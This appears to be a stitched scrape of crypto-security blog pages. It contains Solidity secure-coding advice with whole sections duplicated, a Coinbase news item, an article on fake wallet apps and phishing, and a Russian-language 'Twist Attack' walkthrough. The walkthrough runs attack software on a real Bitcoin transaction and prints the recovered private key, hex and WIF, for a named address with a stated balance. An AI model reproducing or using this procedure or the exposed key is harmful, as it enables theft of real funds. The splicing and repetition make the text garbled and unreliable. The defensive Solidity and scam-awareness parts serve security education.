200000) { payees[i].addr.send(payees[i].value); i++; } nextPayeeIndex = i; } You will need to make sure that nothing bad will happen if other transactions are processed while waiting for the next iteration of the payOut() function. So only use this pattern if absolutely necessary. Gas Limit DoS on the Network via Block Stuffing Even if your contract does not contain an unbounded loop, an attacker can prevent other transactions from being included in the blockchain for several blocks by placing computationally intensive transactions with a high enough gas price. To do this, the attacker can issue several transactions which will consume the entire gas limit, with a high enough gas price to be included as soon as the next block is mined. No gas price can guarantee inclusion in the block, but the higher the price is, the higher is the chance. If the attack succeeds, no other transactions will be included in the block. Sometimes, an attacker’s goal is to block transactions to a specific contract prior to specific time. This attack was conducted on Fomo3D, a gambling app. The app was designed to reward the last address that purchased a “key”. Each key purchase extended the timer, and the game ended once the timer went to 0. The attacker bought a key and then stuffed 13 blocks in a row until the timer was triggered and the payout was released. Transactions sent by attacker took 7.9 million gas on each block, so the gas limit allowed a few small “send” transactions (which take 21,000 gas each), but disallowed any calls to the buyKey() function (which costs 300,000+ gas). A Block Stuffing attack can be used on any contract requiring an action within a certain time period. However, as with any attack, it is only profitable when the expected reward exceeds its cost. The cost of this attack is directly proportional to the number of blocks which need to be stuffed. If a large payout can be obtained by preventing actions from other participants, your contract will likely be targeted by such an attack. DoS with (Unexpected) revert DoS (Denial of Service) attacks can occur in functions when you try to send funds to a user and the functionality relies on that fund transfer being successful. This can be problematic in the case that the funds are sent to a smart contract created by a bad actor, since they can simply create a fallback function that reverts all payments. For example: // INSECURE contract Auction { address currentLeader; uint highestBid; function bid() payable { require(msg.value > highestBid); require(currentLeader.send(highestBid)); // Refund the old leader, if it fails then revert currentLeader = msg.sender; highestBid = msg.value; } } As you can see in this example, if an attacker bids from a smart contract with a fallback function reverting all payments, they can never be refunded, and thus no one can ever make a higher bid. This can also be problematic without an attacker present. For example, you may want to pay an array of users by iterating through the array, and of course you would want to make sure each user is properly paid. The problem here is that if one payment fails, the funtion is reverted and no one is paid. address[] private refundAddresses; mapping (address => uint) public refunds; // bad function refundAll() public { for(uint x; x < refundAddresses.length; x++) { // arbitrary length iteration based on how many addresses participated require(refundAddresses[x].send(refunds[refundAddresses[x]])) // doubly bad, now a single failure on send will hold up all funds } } An effective solution to this problem would be to use a pull payment system over the current push payment system. To do this, separate each payment into it’s own transaction, and have the recipient call the function. contract auction { address highestBidder; uint highestBid; mapping(address => uint) refunds; function bid() payable external { require(msg.value >= highestBid); if (highestBidder != address(0)) { refunds[highestBidder] += highestBid; // record the refund that this user can claim } highestBidder = msg.sender; highestBid = msg.value; } function withdrawRefund() external { uint refund = refunds[msg.sender]; refunds[msg.sender] = 0; (bool success, ) = msg.sender.call.value(refund)(""); require(success); } } Denial of Service DoS with (Unexpected) revert Consider a simple auction contract: // INSECURE contract Auction { address currentLeader; uint highestBid; function bid() payable { require(msg.value > highestBid); require(currentLeader.send(highestBid)); // Refund the old leader, if it fails then revert currentLeader = msg.sender; highestBid = msg.value; } } If attacker bids using a smart contract which has a fallback function that reverts any payment, the attacker can win any auction. When it tries to refund the old leader, it reverts if the refund fails. This means that a malicious bidder can become the leader while making sure that any refunds to their address will always fail. In this way, they can prevent anyone else from calling the bid() function, and stay the leader forever. A recommendation is to set up a pull payment system instead, as described earlier. Another example is when a contract may iterate through an array to pay users (e.g., supporters in a crowdfunding contract). It’s common to want to make sure that each payment succeeds. If not, one should revert. The issue is that if one call fails, you are reverting the whole payout system, meaning the loop will never complete. No one gets paid because one address is forcing an error. address[] private refundAddresses; mapping (address => uint) public refunds; // bad function refundAll() public { for(uint x; x < refundAddresses.length; x++) { // arbitrary length iteration based on how many addresses participated require(refundAddresses[x].send(refunds[refundAddresses[x]])) // doubly bad, now a single failure on send will hold up all funds } } Again, the recommended solution is to favor pull over push payments. See SWC-113 DoS with Block Gas Limit Each block has an upper bound on the amount of gas that can be spent, and thus the amount computation that can be done. This is the Block Gas Limit. If the gas spent exceeds this limit, the transaction will fail. This leads to a couple of possible Denial of Service vectors: Gas Limit DoS on a Contract via Unbounded Operations You may have noticed another problem with the previous example: by paying out to everyone at once, you risk running into the block gas limit. This can lead to problems even in the absence of an intentional attack. However, it’s especially bad if an attacker can manipulate the amount of gas needed. In the case of the previous example, the attacker could add a bunch of addresses, each of which needs to get a very small refund. The gas cost of refunding each of the attacker’s addresses could, therefore, end up being more than the gas limit, blocking the refund transaction from happening at all. This is another reason to favor pull over push payments. If you absolutely must loop over an array of unknown size, then you should plan for it to potentially take multiple blocks, and therefore require multiple transactions. You will need to keep track of how far you’ve gone, and be able to resume from that point, as in the following example: struct Payee { address addr; uint256 value; } Payee[] payees; uint256 nextPayeeIndex; function payOut() { uint256 i = nextPayeeIndex; while (i < payees.length && gasleft() > 200000) { payees[i].addr.send(payees[i].value); i++; } nextPayeeIndex = i; } You will need to make sure that nothing bad will happen if other transactions are processed while waiting for the next iteration of the payOut() function. So only use this pattern if absolutely necessary. Gas Limit DoS on the Network via Block Stuffing Even if your contract does not contain an unbounded loop, an attacker can prevent other transactions from being included in the blockchain for several blocks by placing computationally intensive transactions with a high enough gas price. To do this, the attacker can issue several transactions which will consume the entire gas limit, with a high enough gas price to be included as soon as the next block is mined. No gas price can guarantee inclusion in the block, but the higher the price is, the higher is the chance. If the attack succeeds, no other transactions will be included in the block. Sometimes, an attacker’s goal is to block transactions to a specific contract prior to specific time. This attack was conducted on Fomo3D, a gambling app. The app was designed to reward the last address that purchased a “key”. Each key purchase extended the timer, and the game ended once the timer went to 0. The attacker bought a key and then stuffed 13 blocks in a row until the timer was triggered and the payout was released. Transactions sent by attacker took 7.9 million gas on each block, so the gas limit allowed a few small “send” transactions (which take 21,000 gas each), but disallowed any calls to the buyKey() function (which costs 300,000+ gas). A Block Stuffing attack can be used on any contract requiring an action within a certain time period. However, as with any attack, it is only profitable when the expected reward exceeds its cost. The cost of this attack is directly proportional to the number of blocks which need to be stuffed. If a large payout can be obtained by preventing actions from other participants, your contract will likely be targeted by such an attack. External Calls Use caution when making external calls Calls to untrusted contracts can introduce several unexpected risks or errors. External calls may execute malicious code in that contract or any other contract that it depends upon. As such, every external call should be treated as a potential security risk. When it is not possible, or undesirable to remove external calls, use the recommendations in the rest of this section to minimize the danger. Mark untrusted contracts When interacting with external contracts, name your variables, methods, and contract interfaces in a way that makes it clear that interacting with them is potentially unsafe. This applies to your own functions that call external contracts. // bad Bank.withdraw(100); // Unclear whether trusted or untrusted function makeWithdrawal(uint amount) { // Isn't clear that this function is potentially unsafe Bank.withdraw(amount); } // good UntrustedBank.withdraw(100); // untrusted external call TrustedBank.withdraw(100); // external but trusted bank contract maintained by XYZ Corp function makeUntrustedWithdrawal(uint amount) { UntrustedBank.withdraw(amount); } Avoid state changes after external calls Whether using raw calls (of the form someAddress.call()) or contract calls (of the form ExternalContract.someMethod()), assume that malicious code might execute. Even if ExternalContract is not malicious, malicious code can be executed by any contracts it calls. One particular danger is malicious code may hijack the control flow, leading to vulnerabilities due to reentrancy. (See Reentrancy for a fuller discussion of this problem). If you are making a call to an untrusted external contract, avoid state changes after the call. This pattern is also sometimes known as the checks-effects-interactions pattern. See SWC-107 Don’t use transfer() or send(). .transfer() and .send() forward exactly 2,300 gas to the recipient. The goal of this hardcoded gas stipend was to prevent reentrancy vulnerabilities, but this only makes sense under the assumption that gas costs are constant. Recently EIP 1884 was included in the Istanbul hard fork. One of the changes included in EIP 1884 is an increase to the gas cost of the SLOAD operation, causing a contract’s fallback function to cost more than 2300 gas. It’s recommended to stop using .transfer() and .send() and instead use .call(). // bad contract Vulnerable { function withdraw(uint256 amount) external { // This forwards 2300 gas, which may not be enough if the recipient // is a contract and gas costs change. msg.sender.transfer(amount); } } // good contract Fixed { function withdraw(uint256 amount) external { // This forwards all available gas. Be sure to check the return value! (bool success, ) = msg.sender.call.value(amount)(""); require(success, "Transfer failed."); } } Note that .call() does nothing to mitigate reentrancy attacks, so other precautions must be taken. To prevent reentrancy attacks, it is recommended that you use the checks-effects-interactions pattern. Handle errors in external calls Solidity offers low-level call methods that work on raw addresses: address.call(), address.callcode(), address.delegatecall(), and address.send(). These low-level methods never throw an exception, but will return false if the call encounters an exception. On the other hand, contract calls (e.g., ExternalContract.doSomething()) will automatically propagate a throw (for example, ExternalContract.doSomething() will also throw if doSomething() throws). If you choose to use the low-level call methods, make sure to handle the possibility that the call will fail, by checking the return value. // bad someAddress.send(55); someAddress.call.value(55)(""); // this is doubly dangerous, as it will forward all remaining gas and doesn't check for result someAddress.call.value(100)(bytes4(sha3("deposit()"))); // if deposit throws an exception, the raw call() will only return false and transaction will NOT be reverted // good (bool success, ) = someAddress.call.value(55)(""); if(!success) { // handle failure code } ExternalContract(someAddress).deposit.value(100)(); See SWC-104 Favor pull over push for external calls External calls can fail accidentally or deliberately. To minimize the damage caused by such failures, it is often better to isolate each external call into its own transaction that can be initiated by the recipient of the call. This is especially relevant for payments, where it is better to let users withdraw funds rather than push funds to them automatically. (This also reduces the chance of problems with the gas limit.) Avoid combining multiple ether transfers in a single transaction. // bad contract auction { address highestBidder; uint highestBid; function bid() payable { require(msg.value >= highestBid); if (highestBidder != address(0)) { (bool success, ) = highestBidder.call.value(highestBid)(""); require(success); // if this call consistently fails, no one else can bid } highestBidder = msg.sender; highestBid = msg.value; } } // good contract auction { address highestBidder; uint highestBid; mapping(address => uint) refunds; function bid() payable external { require(msg.value >= highestBid); if (highestBidder != address(0)) { refunds[highestBidder] += highestBid; // record the refund that this user can claim } highestBidder = msg.sender; highestBid = msg.value; } function withdrawRefund() external { uint refund = refunds[msg.sender]; refunds[msg.sender] = 0; (bool success, ) = msg.sender.call.value(refund)(""); require(success); } } See SWC-128 Don’t delegatecall to untrusted code The delegatecall function is used to call functions from other contracts as if they belong to the caller contract. Thus the callee may change the state of the calling address. This may be insecure. An example below shows how using delegatecall can lead to the destruction of the contract and loss of its balance. contract Destructor { function doWork() external { selfdestruct(0); } } contract Worker { function doWork(address _internalWorker) public { // unsafe _internalWorker.delegatecall(bytes4(keccak256("doWork()"))); } } If Worker.doWork() is called with the address of the deployed Destructor contract as an argument, the Worker contract will self-destruct. Delegate execution only to trusted contracts, and never to a user supplied address. Front-running is a pervasive issue in Ethereum DApps. DApp developers don’t necessarily have the mindset to design DApps with front-running in mind. This is an attempt to bring forward the subject and increase awareness of these type of attacks. While some DApp-level application logic could be built to mitigate these attacks, its ubiquity across different DApp categories suggests mitigations at the blockchain-level would perhaps be more effective. We highlight this as an important research area. We consider front-running to be a course of action where an entity benefits from prior access to privileged market information about upcoming transactions and trades. Front-running has been an issue in financial instrument markets since the 1970s. With the advent of the blockchain technology, front-running has resurfaced in new forms we explore here, instigated by blockchain’s decentralized and transparent nature. In this paper, we draw from a scattered body of knowledge and instances of front-running across the top 25 most active decentral applications (DApps) deployed on Ethereum blockchain. Additionally, we carry out a detailed analysis of Status.im initial coin offering (ICO) and show evidence of abnormal miner’s behavior indicative of front-running token purchases. Finally, we map the proposed solutions to front-running into useful categories GitHub Telegram: https://t.me/cryptodeeptech Video: https://youtu.be/HVh_cbsgSMg Source: https://cryptodeep.ru/improving-overall-security Криптоанализ-
- Закрытыйключ
- Криптография
- (and 8 more)
-
Партнерство со Standard Chartered позволит американской бирже Coinbase предлагать бесплатные банковские переводы для пользователей из Сингапура. Согласно официальному сообщению в блоге Coinbase, партнерство двух финансовых компаний позволит предоставлять клиентам биржи из Сингапура бесплатное банковское обслуживание при переводе средств на биржевые счета и обратно через любой национальный банк города-государства. Все переводы в сингапурских долларах будут обслуживаться банковской структурой Standard Chartered и не облагаться комиссией, говорится в заявлении компании. Ранее пользователи могли покупать криптоактивы и пополнять биржевые счета только с помощью банковских карт систем Visa или Mastercard «Поскольку Сингапур намерен стать глобальным центром криптографии и блокчейна, мы стремимся поддерживать эти амбиции и предлагать лучшие продукты на сингапурском рынке. Это означает, что теперь можно легко зачислять или обналичивать свои средства в Coinbase с помощью бесплатных банковских переводов. Это придает еще больше гибкости для инвестиций и контроля над активами», — завили в Coinbase. Подробнее: https://bits.media/coinbase-obyavila-ob-integratsii-s-bankovskim-platezhnym-servisom-standard-chartered/
-
- Coinbase
- Standard_Chartered
-
(and 8 more)
Tagged with:
-
CRYPTO DEEP TECH В этой статье мы реализуем Twist Attack на примере №2 согласно первой теоретической части статьи мы убедились что с помощью определенных точек на эллиптической кривой secp256k1 мы можем получить частичные значение приватного ключа и в течение 5-15 минут восстановить Биткоин Кошелек используя “Sagemath pollard rho function: (discrete_log_rho)” и “Chinese Remainder Theorem”. https://github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md Согласно твиту Paulo Barreto: https://twitter.com/pbarreto/status/825703772382908416?s=21 The cofactor is 3^2*13^2*3319*22639 E1: 20412485227 E2: 3319, 22639 E3: 109903, 12977017, 383229727 E4: 18979 E6: 10903, 5290657, 10833080827, 22921299619447 prod = 20412485227 * 3319 * 22639 *109903 * 12977017 * 383229727 * 18979 * 10903 * 5290657 * 10833080827 * 22921299619447 38597363079105398474523661669562635951234135017402074565436668291433169282997 = 3 * 13^2 * 3319 * 22639 * 1013176677300131846900870239606035638738100997248092069256697437031 HEX:0x55555555555555555555555555555555C1C5B65DC59275416AB9E07B0FEDE7B5 E1: y^2 = x^3 + 1 E2: y^2 = x^3 + 2 E3: y^2 = x^3 + 3 E4: y^2 = x^3 + 4 E6: y^2 = x^3 + 6 https://attacksafe.ru/twist-attack-on-bitcoin y² = x³ + ax + b. In the Koblitz curve, y² = x³ + 0x + 7. In the Koblitz curve, 0 = x³ + 0 + 7 b '= -x ^ 3 - ax. Перейдем к экспериментальной части: (Рассмотрим Биткоин Адрес) (Теперь рассмотрим критический уязвимые транзакции) Откроем [TerminalGoogleColab]. Реализуем алгоритм Twist Attack с помощью нашей репозитории 18TwistAttack git clone https://github.com/demining/CryptoDeepTools.git cd CryptoDeepTools/18TwistAttack/ ls Установим все нужные нам пакеты requirements.txt sudo apt install python2-minimal wget https://bootstrap.pypa.io/pip/2.7/get-pip.py sudo python2 get-pip.py pip2 install -r requirements.txt , Подготовим RawTX для атаки RawTX = 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000 Сохраним в файле: RawTX.txt Чтобы реализовать атаку мы воспользуемся программным обеспечение “ATTACKSAFE SOFTWARE” www.attacksafe.ru/software Права доступа: chmod +x attacksafe Применение: ./attacksafe -help -version: software version -list: list of bitcoin attacks -tool: indicate the attack -gpu: enable gpu -time: work timeout -server: server mode -port: server port -open: open file -save: save file -search: vulnerability search -stop: stop at mode -max: maximum quantity in mode -min: minimum quantity per mode -speed: boost speed for mode -range: specific range -crack: crack mode -field: starting field -point: starting point -inject: injection regimen -decode: decoding mode ./attacksafe -version Version 5.3.2. [ATTACKSAFE SOFTWARE, © 2023] "ATTACKSAFE SOFTWARE" включает в себя все популярные атаки на Биткоин. Запустим список всех атак: ./attacksafe -list Выберем -tool: twist_attack Чтобы получить определенные точки secp256k1 из уязвимой транзакции подписи ECDSA, мы добавили данные RawTX в текстовый документ и сохранил как файл RawTX.txt 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000 Запустим -tool twist_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” ./attacksafe -tool twist_attack -open RawTX.txt -save SecretPoints.txt Мы запустили данную атаку из -tool twist_attack и результат сохранился в файл SecretPoints.txt Теперь чтобы посмотреть успешный результат откроем файл SecretPoints.txt cat SecretPoints.txt Результат: Elliptic Curve Secret Points: Q11 = E1([97072073026593516785986136148833105674452542501015145216961054272876839453879, 107567253371779495307521678088935176637661904239924771700494716430774957820966]) Q21 = E2([3350296768277877304391506547616361976369787138559008027651808311357100316617, 72988900267653266243491077449097157591503403928437340215197819240911749073070]) Q22 = E2([112520741232779465095566100761481226712887911875949213866586208031790667764851, 67821409607391406974451792678186486803604797717916857589728259410989018828088]) Q31 = E3([19221018445349571002768878066568778104356611670224206148889744255553888839368, 51911948202474460182474729837629287426170495064721963100930541018009108314113]) Q32 = E3([41890177480111283990531243647299980511217563319657594412233172058507418746086, 50666391602993122126388747247624601309616370399604218474818855509093287774278]) Q33 = E3([42268931450354181048145324837791859216268206183479474730830244807012122440868, 106203099208900270966718494579849900683595613889332211248945862977592813439569]) Q41 = E4([54499795016623216633513895020095562919782606390420118477101689814601700532150, 105485166437855743326869509276555834707863666622073705127774354124823038313021]) Q61 = E6([62124953527279820718051689027867102514830975577976669973362563656149003510557, 100989088237897158673340534473118617341737987866593944452056172771683426720481]) Q62 = E6([86907281605062616221251901813989896824116536666883529138776205878798949076805, 19984923138198085750026187300638434023309806045826685297245727280111269894421]) Q63 = E6([66063410534588649374156935204077330523666149907425414249132071271750455781006, 25315648259518110320341360730017389015499807179224601293064633820188666088920]) Q64 = E6([109180854384525934106792159822888807664445139819154775748567618515646342974321, 102666617356998521143219293179463920284010473849613907153669896702897252016986]) RawTX = 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000 Теперь добавим полученные точки secp256k1 Для этого откроем Python-script: discrete.py Для того чтобы запустить Python-script: discrete.py установим SageMath Команда установки: sudo apt-get update sudo apt-get install -y python3-gmpy2 yes '' | sudo env DEBIAN_FRONTEND=noninteractive apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" install sagemath Проверим установку SageMath по команде: sage -v SageMath version 9.0 Чтобы решить дискретное логарифмирование (Pollard's rho algorithm for logarithms) запустим Python-script: discrete.py Команда запуска: sage -python3 discrete.py Результат: Discrete_log_rho: 14996641256 1546 19575 31735 9071789 145517682 11552 7151 3370711 10797447604 10120546250224 PRIVATE KEY: 3160389728152122137789469305939632411648887242506549174582525524562820572318 privkey = crt([x11, x21, x22, x31, x32, x33, x41, x61, x62, x63, x64], [ord11, ord21, ord22, ord31, ord32, ord33, ord41, ord61, ord62, ord63, ord64]) Конвертируем приватный ключ в HEX формат Десятичный формат приватного ключа был сохранен в файл: privkey.txt Запустим Python-script: privkey2hex.py python3 privkey2hex.py cat privkey2hex.txt Откроем полученный файл: privkey2hex.txt Приватный ключ в HEX формате: PrivKey = 06fcb79a2eabffa519509e43b7de95bc2df15ca48fe6be29f9160bcd6ac1a49e Откроем bitaddress и проверим: ADDR: 1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx WIF: KwTHx3AhV8qiN6qyfG1D85TGEeUBiaMUjnQ11eVLP5NAfiVNLLmS HEX: 06FCB79A2EABFFA519509E43B7DE95BC2DF15CA48FE6BE29F9160BCD6AC1A49E https://live.blockcypher.com/btc/address/1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx/ BALANCE: $ 902.52 Исходный код ATTACKSAFE SOFTWARE Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/pOviZOYItv4 Источник: https://cryptodeep.ru/twist-attack-2 Криптоанализ
-
- Закрытыйключ
- Криптография
-
(and 8 more)
Tagged with:
-
CRYPTO DEEP TECH The rise of fake cryptocurrency apps and how to avoid them. Scammers are using fake crypto apps to steal funds from investors. Some malicious apps find their way into official app stores. And, according to the latest fraud report, fraudsters are using fake crypto apps to steal money from unsuspecting crypto investors. It highlights that American investors have lost approximately $42.7 million to swindlers through fake apps. The schemes reportedly take advantage of heightened interest in cryptocurrencies, especially during bull market runs, to beguile crypto users. How fake crypto app scammers lure users Fake crypto app scammers use myriad techniques to entice investors. The following is a breakdown of some of them. Social engineering schemes Some fake crypto app scammer networks use social engineering strategies to entice victims. In many cases, the fraudsters befriend the victims through social platforms such as dating sites and then trick them into downloading apps that appear to be functional cryptocurrency trading apps. The scammers then convince users to transfer funds to the app. The funds are, however, “locked in” once the transfer is made, and the victims are never allowed to withdraw money. In some cases, the scammers lure victims using outlandish high-yield claims. The ruse comes to an end when the victims realize that they can’t redeem their funds. Speaking to Cointelegraph earlier this week, Rick Holland, chief information security officer of Digital Shadows — a digital risk protection firm — underscored that social engineering remains a top strategy among crooks because it requires minimal effort. “Relying upon the tried-and-true method of social engineering is far more practical and lucrative,” he said. The cybersecurity manager added that social engineering makes it easy for scammers to target high-net-worth individuals. Context: Bob ( fake name, real person) received a text claiming to be from his exchange. The message states that due to the recent ban on crypto in China, all users must withdraw their funds to a defi wallet. The text also included a link to the wallet where Bob can transfer his funds. After downloading the wallet, Bob removed all of his funds from the exchange. More than $10 million in ERC20-USDT were transferred. Little did Bob know that he had just become the victim of a phishing scam. Bob reached out to us for help recovering his funds. Bob wasn’t the first person to contact us regarding these scams. Scams are becoming more common as interest in cryptocurrency grows. According to data from our MistTrack service, more than 60% of all reported hacks were related to fake wallets. There are several ways to protect yourself against phishing attacks: Never click on any link from an unknown source, even if it appears legitimate. Scammers frequently send emails or texts containing links to a fake wallet. Always go to the original website rather than clicking on sponsored ads. Scammers often purchase ad space on search engines to promote their counterfeit website that often appears genuine. Scammers will regularly message you pretending to help. After gaining your trust, they will send you a link to download their app and transfer funds to it. They will often fabricate why you cannot withdraw funds unless you deposit additional funds into it. Many who fall victim to these scams never receive their money back. Scammers would often pose as support from Metamask. They would pretend to help anyone currently having difficulties using Metamask. After gaining their trust, they would send over a link asking the victim to input their seed phase. Metamask will NEVER ask for your seed phrase or private key. This is what a fake Metamask wallet might look like. In-depth analysis Our team begins to analyze and research the information provided by these victims. According to our ongoing investigation, tens of thousands of victims had their assets stolen from these phishing scams. So far, the total amount stolen exceeds $1.3 billion. These are the only funds reported to SlowMist, and we only counted ETH, BTC, TRX, ERC20-USDT, and TRC20-USDT. The graph below depicts the number of reported cases to us during November. One victim provided us with the Tron address of the scammer. Using MistTrack, our team was able to track down and analyze the scammer’s address. It showed an additional 14 addresses that had transferred funds to this address. We can assume that these addresses also fell victims to this phishing scam. In total, the scammer was able to walk away with over $250,000 in Trc20-USDT. Which they later distributed to various Binance accounts. We followed one of these Binance accounts and discovered it had over $600,000 in TRC20 — USDT. Imagine the total amount stolen if this was just one of the addresses the scammer uses. As we investigated further into this account, we discovered more illegal activity associated with it. According to our AML(anti-money laundering) software, a BTC address associated with this account (32q…fia) was used for extortion. Through the investigation of this address, we concluded that these phishing schemes were not isolated events but rather part of a larger global scale. Furthermore, our research indicates that the scammer will frequently transfer portions of the funds to multiple exchanges and to another scammer wallet with a significant amount of transactions to confuse our analysis. Recognizable brand names Some fake crypto app scammers have resorted to using recognizable brand names to push fake apps because of the trust and authority that they wield. In one case highlighted in the latest crypto crime report, cybercriminals posing as YiBit employees recently hoodwinked investors out of some $5.5 million after convincing them to download a bogus YiBit crypto trading app. Unbeknown to the investors, the actual YiBit crypto exchange firm ceased operations in 2018. Fund transfers made to the fake app were stolen. In another case outlined in the report, phishers using the Supay brand name, which is associated with an Australian crypto company, swindled 28 investors out of millions of dollars. The ploy, which ran between Nov. 1 and Nov. 26, caused $3.7 million in losses. Such schemes have been going on for years, but many incidences go unreported due to the lack of proper recourse channels, especially in jurisdictions that shun cryptocurrencies. Besides the U.S., investigations in other major jurisdictions such as India have in the recent past uncovered elaborate fake crypto app schemes. According to a report published by the CloudSEK cybersecurity company in June, a newly discovered fake crypto app scheme involving numerous cloned apps and domains caused Indian investors to lose at least $128 million. Distributing fake apps through official app stores Fake crypto app scammers sometimes use official app stores to distribute dodgy applications. Some of the apps are designed to collect user credentials that are then used to unlock crypto accounts on corresponding official platforms. Others claim to offer secure wallet solutions that can be used to store a diverse range of cryptocurrencies but pilfer funds once a deposit is made. While platforms such as Google Play Store constantly review apps for integrity issues, it is still possible for some fake apps to slip through the cracks. One of the latest methods used by scammers to accomplish this is registering as app developers on popular mobile app stores such as the Apple App Store and Google Play Store and then uploading legitimate-looking apps. In 2021, a fake Trezor app masquerading as a wallet created by SatoshiLabs used this strategy to get published on both Apple App Store and Google Play Store. The app claimed to provide users with direct online access to their Trezor hardware wallets without needing to connect their Trezor dongle to a computer. Victims who downloaded the fake Trezor app were obligated to submit their wallet seed phrase to start using the service. A seed phrase is a string of words that can be used to access a cryptocurrency wallet on the blockchain. The submitted details allowed the thieves behind the fake app to loot user funds. According to a statement provided by Apple, the fake Trezor app was published on its store through a deceptive bait-and-switch maneuver. The app developers are alleged to have initially submitted the app as a cryptography application designed to encrypt files but later on converted it to a cryptocurrency wallet app. Apple said that it was not aware of the change until users reported it. Speaking to Cointelegraph earlier this week, Chris Kline, co-founder of Bitcoin IRA — a crypto retirement investment service — said that despite such incidents, major tech companies in the space were resolute in fighting fake crypto apps because of the potential damage to their integrity. He said: “Tech companies are always looking for better education and security for their users. The most reputable players today put security at the forefront of their roadmaps. Users need reassurance that their digital assets are safe and providers are keeping security top of mind.” That said, the fake app problem is more prevalent in non-official app stores. Cryptocurrency is risky enough without having to worry about scams. No matter which one you choose, you will deal with volatile values. Throw in some crooks, and the risk goes up exponentially. Social media is a goldmine for scammers to find new victims. Now, fake crypto ads are circulating on Facebook and other platforms. The ads use images of well-known industry leaders to lure people into buying crypto that doesn’t exist. Cybersecurity researchers recently found 40 copycat sites designed to look like legitimate crypto services. The sites advertise crypto wallet apps that are anything but legitimate. Keep reading to find out the risks and protect your finances. Watch your wallet Cryptocurrency wallets are physical or digital storage devices for your cryptocurrency. The wallets themselves hold public and private keys, which give you access to your crypto. How to spot a fake crypto app Fake cryptocurrency apps are designed to resemble legitimate apps as closely as possible. As a crypto investor, one should be able to discern between legitimate and fake apps to avoid unnecessary losses. The following is a breakdown of some of the things to look out for when trying to ascertain the authenticity of a mobile crypto application. Evidence shows that a crook is recruiting partners to distribute these bad apps via telemarketing, social media, advertisement, SMS, third-party channels, fake websites and more. ESET researchers also uncovered malicious wallets being distributed via legitimate Chinese websites, with articles containing links to fake wallet apps. The posts used real wallet names such as Coinbase, imToken, Bitpie, MetaMask, TokenPocket, OneKey and Trust Wallet but led to copycat websites. A thief used another legitimate Chinese website to post an article about Beijing’s crypto ban. The author included a list of genuine crypto wallets to get around the ban, along with links to bogus websites with download links for fake apps. Different effects on iOS and Android The malware works differently depending on your operating system. The fake Android wallet apps target new crypto users who do not have a legitimate wallet app installed on their devices. If you already have an official wallet app, the malicious one won’t be installed due to Android security measures, which don’t let you replace an original app with one that isn’t legitimate. The copycat websites let Android users download the malicious apps from their servers even if they tap on the “Get it on Google Play” button. Following that, the app needs to be installed manually. When it comes to iOS, multiple versions of an app can be installed simultaneously. But due to Apple’s stricter screening process, you won’t find these malicious apps in the App Store. So if you are an Apple user, you’d have to install the malicious apps from a third-party store or click on malicious links found on places like social media. The websites for these apps let users download apps outside the official store, using a system Apple put in place for businesses and educational institutes to install custom apps without going through the App Store. You must then manually install these apps. Once the app is up and running, it appears to work like a legitimate crypto wallet. But it isn’t. Instead, it’s stealing the currency deposited into it. Spelling, icons and description The first step in ascertaining whether an app is legit is checking out the spelling and icon. Fake apps usually have a name and icon that looks similar to the legitimate one, but something is usually off. If the app or developer names are misspelled, for example, the software is most likely phony. A quick search about the app on the internet will help to confirm its legitimacy. It is also important to consider if the app has a Google Editor’s choice badge. The badge is a distinction provided by the Google Play editorial team to recognize developers and apps with outstanding quality. Apps with this badge are unlikely to be fake. Don’t be a victim Follow these tips to keep crypto scammers at bay: Use official apps from official app stores that contain links to official websites. Be wary of online ads for crypto. Research any wallet app you’re interested in. Look for reviews and information about the company behind the app. Before you buy crypto, read Kim’s eBook on the subject. Application permissions Counterfeit apps usually request more permissions than necessary. This ensures that they glean as much data as possible from victims’ devices. As such, users should be wary of apps that require off-center permissions, such as device administrator privileges. Such authorizations could give cybercriminals unfettered access to a device and allow them to intercept sensitive data that can be used to unlock financial accounts, including crypto wallets. Intrusive app permissions can be blocked via a phone system’s privacy settings. Fake websites Scammers sometimes create fake cryptocurrency trading platforms or fake versions of official crypto wallets to trick unsuspecting victims. These fake websites usually have similar but slightly different domain names from the sites they attempt to mimic. They look very similar to legitimate sites, making it difficult to tell the difference. Fake crypto sites often operate in one of two ways: As phishing pages: All the details you enter, such as your crypto wallet’s password and recovery phrase and other financial information, end up in the scammers’ hands. As straightforward theft: Initially, the site may allow you to withdraw a small amount of money. As your investments seem to perform well, you might invest more money in the site. However, when you subsequently want to withdraw your money, the site either shuts down or declines the request. Phishing scams Crypto phishing scams often target information relating to online wallets. Scammers target crypto wallet private keys, which are required to access funds within the wallet. Their method of working is similar to other phishing attempts and related to the fake websites described above. They send an email to lure recipients to a specially created website asking them to enter private key information. Once the hackers have acquired this information, they steal the cryptocurrency in those wallets. Pump and dump schemes This involves a particular coin or token being hyped by fraudsters through an email blast or social media such as Twitter, Facebook, or Telegram. Not wanting to miss out, traders rush to buy the coins, driving up the price. Having succeeded in inflating the price, the scammers then sell their holdings – which causes a crash as the asset’s value sharply declines. This can happen within minutes. Fake apps Another common way 